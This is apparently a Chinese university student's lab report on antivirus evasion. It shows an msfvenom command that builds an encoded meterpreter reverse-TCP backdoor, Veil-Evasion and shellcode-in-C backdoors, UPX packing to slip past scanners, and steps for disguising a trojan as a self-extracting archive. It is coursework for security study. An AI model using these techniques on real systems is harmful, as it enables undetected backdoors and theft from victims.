2017-2018-2 20155303 『网络对抗技术』Exp3：免杀原理与实践

<h1 align = "center"><span style="color:green"><font face="方正小标宋简体" size=6>2017-2018-2 20155303 『网络对抗技术』Exp3：免杀原理与实践</font></span></h1>

<a name="ALL"></a> ##<h1 align = "center">————————CONTENTS————————</h1>

• <font face="华文中宋" size=4>1. 免杀原理与实践说明</font>
  • 实验说明
  • 基础问题回答
• <font face="华文中宋" size=4>2. 使用msf编码器生成后门程序及检测</font>
• <font face="华文中宋" size=4>3. 使用veil-evasion生成后门程序及检测</font>
• <font face="华文中宋" size=4>4. 使用shellcode生成后门程序并检测</font>
• <font face="华文中宋" size=4>5. 实验中遇到的问题及思考</font>
  • 尝试点其余有趣的？——自解压捆绑木马
  • 一样的病毒，不一样的杀软杀出来不同的结果？
• <font face="华文中宋" size=4>6. 实验总结及体会</font>
• <font face="华文中宋" size=4>附：参考资料</font>

---

<a name="1"></a> ###<h1 align = "center">1. 免杀原理与实践说明</h1>

###1、实验说明

• 任务一：正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，本身利用shellcode编程等免杀工具或技巧；(1.5分)

• 任务二：经过组合应用各类技术实现恶意代码免杀(1分)

• 任务三：用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本（1分）

###2、基础问题回答

• 问：杀软是如何检测出恶意代码的？

  • 基于特征来检测：恶意代码中通常会有一段有较明显特征的代码也就是特征码，若是杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配，就会把该程序看成恶意软件。
  • 基于行为来检测：经过对恶意代码的观察、研究，有一些行为是恶意代码的共同行为，并且比较特殊。因此当一个程序在运行时，杀毒软件会监视其行为，若是发现了这种特殊的行为，则会把它当成恶意软件。

• 问：免杀是作什么？

  • 经过使用一些技术手段，让杀毒软件没法识别并分析主机中的恶意代码。

• 问：免杀的基本方法有哪些？

  • 改变特征码：
    • 只有exe——加壳
    • 有shellcode——利用shellcode生成可执行文件
    • 有源代码——用其余语言重写再编译
  • 改变行为：
    • 通信方式：尽可能使用反弹式链接、使用隧道技术、加密通信数据等。
    • 操做模式：基于内存操做、减小对系统的修改、加入混淆做用的正常功能代码等。

返回目录

---

<a name="2"></a> ###<h1 align = "center">2. 使用msf编码器生成后门程序及检测</h1>

一、在《Exp2：后门原理与实践》博客中，咱们生成了一个后门文件。将其放在virscan.org中进行扫描，结果以下图所示：

能够看出，39款杀软中有20款报出了病毒。缘由也可想而知，Msfvenom是Metasploit平台下用来编码payloads免杀的工具。以Metaspliot的知名度和普及度，只要一有新编码算法，立刻就会加到特征库里了。

二、使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=xxx LPORT=xxx -f exe > met-encoded10.exe指令进行屡次编码：

再使用virscan.org进行扫描，结果以下所示：

仍然有19款杀软发现病毒。并无什么卵用。屡次编码以后的后门，仍是会被大多数杀软发现并清理的。

返回目录

---

<a name="3"></a> ###<h1 align = "center">3. 使用veil-evasion生成后门程序及检测</h1>

安装veil-evasion的时候遇到了好多麻烦事，网速贼慢，好不容易下载好了，“展开对象”执行了俩小时还没结束，去网上也搜不到相关的缘由和解释，最终仍是拷贝了老师的虚拟机。

一、启动evail-evasion，设置好回连的IP地址和端口号后，生成后门文件：

二、放到virscan.org上扫描一下：

比以前用msf生成的文件报毒率低，但仍是会被杀软检测出来。

返回目录

---

<a name="4"></a> ###<h1 align = "center">4. 注入Shellcode并执行</h1> 在《Exp2：后门原理与实践》博客中，一样介绍了生成shellcode的方法，此次咱们利用生成的shellcode编写后门程序，半手工打造恶意软件。

一、生成的shellcode以下图所示：

二、利用shellcode编写一个C语言程序后门，在windows下编译运行后，测试其可用性：

能够看到，成功获取了windows权限。

三、不幸的是，仍是被杀毒软件发现了：

四、扫描发现，仍有20%的杀软可以扫描出来：

五、再进行加壳尝试吧。使用UPX对生成的后门程序加壳：

六、杀软没有发现它，扫描结果也比较乐观：

七、测试仍然可用：

返回目录

---

<a name="5"></a> ###<h1 align = "center">5. 实验中遇到的问题及思考</h1>

###1、尝试点其余有趣的？——自解压捆绑木马 随着人们对木马的了解和防范意识的加强，木马设计者们开发出了更多的功能来假装木马，以达到下降用户警觉的目的。经常使用的假装手段有：

• 修改图标：将木马服务端程序的图标改为HTML、TXT、ZIP等文件格式的图标，使其具备迷惑性。
• 文件捆绑：将木马捆绑到一个安装程序上，当安装程序运行时，木马便会在用户毫无察觉的状况下进入系统。被捆绑的文件通常是可执行文件（如EXE、COM等格式的文件），迷惑性很大。即便重装了系统，若是系统中还安装了那个程序，就颇有可能再次中招。
• 更改木马服务端程序的名称：大多数改成与系统文件相似的名字，好比windows.exe啦，或者把后缀改成d11以模仿dll文件之类的。
• ......

在这里，咱们来尝试制做自解压捆绑木马。

一、将要捆绑的文件们放在同一个文件夹下，右击选择“添加到压缩文件”

二、设置压缩参数。起一个有趣的名字，并勾选上“建立自解压格式压缩文件”复选框。

三、切换至“高级”选项卡，点击“自解压选项”，选中“模式”中的“所有隐藏”并肯定。

四、再打开“文本和图标”选项卡，填写“自解压文件窗口标题”和“自解压文件窗口中显示的文本”，并找一个有趣的图标做为这个自解压文件的图标，好比下面这个比较符合“Linux软件教程”气质的图标：

点击肯定按钮。

五、这样一来，咱们就生成了一个看起来很是正经的自解压的压缩文件。

六、放到virscan.org试一下，虽然说仍是会被部分杀软发现，但几率下降了不少~

###2、一样的病毒，不一样的杀软杀出来不同的结果？

在virscan.org上面检测的过程当中，发现虽然上传的是一个文件，但不一样的杀毒软件，扫描结果不尽相同。这是为何呢？扫描出来的结果都是些什么呢？

查阅资料了解到，这是由于不一样的杀毒软件病毒库不彻底相同，杀毒引擎不同，另外，不一样的软件功臣是对病毒、系统漏洞的理解也不尽相同。这就形成了杀软结果的千差万别。

返回目录

---

<a name="6"></a> ###<h1 align = "center">5. 实验总结及体会</h1>

• 离实战还缺什么步骤？
  • 实验中的后门程序都是咱们生硬地复制粘贴到靶机上的，但实际攻击的时候怎么可能乖乖让咱们把一个赤裸裸的木马放过去？！因此这就用到了一些木马假装技术，包括木马捆绑、自解压木马、CHM木马等等，课下也进行了浅显的了解和练习，发现的确离实战还有很长一段路要走...
• 此次实验仍是一如既往的有趣，无论是平台生成仍是手工打造，能生成一个不被杀软发现的后门程序仍是有些难度的，须要在不断的摸索中一点一点尝试。虽然这次实验很是基础，对一些现有平台的依赖性仍然很强，但倒是一个良好的开端，可以为咱们进一步深刻研究免杀提供思路。
• 打造免杀软件的过程也增长了危机意识，杀软杀不出来不表明绝对安全。想生成一个不被发现的后门其实也不是什么难事。因此平日要提升安全意识，不要随便在网上下载可执行文件，也不要点击可疑连接，尽可能减小被植入后门的可能。

返回目录

---

<a name="7"></a> ###<h1 align = "center">附：参考资料</h1>

• MAL_免杀原理与实践
• kali下的免杀之veil安装步骤
• VirSCAN.org
• VirusTotal
• 常见病毒种类与杀毒软件分析